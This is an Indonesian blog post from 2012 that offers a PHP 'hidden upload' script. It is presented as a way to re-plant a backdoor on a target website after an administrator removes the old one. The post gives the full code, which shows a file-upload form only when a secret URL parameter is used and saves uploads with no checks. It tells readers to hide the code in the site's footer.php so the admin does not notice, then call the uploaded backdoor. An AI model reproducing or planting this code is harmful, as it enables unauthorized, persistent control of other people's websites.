Selasa, 30 Oktober 2012

PHP Simple Upload Hidden

Cara ini adalah salah satu jalan kita dari sekian banyak cara untuk meng-upload file/backdoor di situs target ketika file/backdoor kita dihapus oleh admin.
NB: untuk menghargai pembuatnya mohon jangan edit dan ngaku-ngaku bikinan sendiri
Ini script PHP simple upload-nya:
<?php if(isset($_GET['khasha']))
{
echo "<body bgcolor=black>

<font color=cyan size=3>";
echo "<h2>Alecs Uploaded Area</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">Filename:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"UPLOAD IT\">
</form>";
if ($_FILES["file"]["error"] > 0)
  {
  echo "Error: " . $_FILES["file"]["error"] . "<br />";
  }
else
  {
  echo "Upload: " . $_FILES["file"]["name"] . "<br />";
  echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "Stored in: " . $_FILES["file"]["tmp_name"];
  }
if (file_exists("" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " already exists. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "" . $_FILES["file"]["name"]);
      echo "Stored in: " . "" . $_FILES["file"]["name"];
echo"<hr>";
      }
  }

?>
Nah cara penggunaanya hanya di sisipkan di salahsatu halaman disitus target kita, contohnya saya sisipkan script ini di footer.php ß biar ga ketauan admin
Seperti ini:
<? script simple upload ß
?>
<?script bawaan situs target ß
?>
Lalu save
Lalu panggil filenya -- > http://www.target.com/footer.php?khasha
khasha < -- adalah paswordnya, lihat di script diatas yang saya blok warna merah


Hasilnya seperti diatas, di liat dari SS-nya saya telah meng-upload backdoor dengan nama file rename.php karna backdoor yang sudah lama tertanam di hapus oleh si admin. Setelah berhasil ter-upload kita panggil file-nya
Hasilnya: http://www.target.com/rename.php

Done. Udah gitu aja.

0 komentar:

Posting Komentar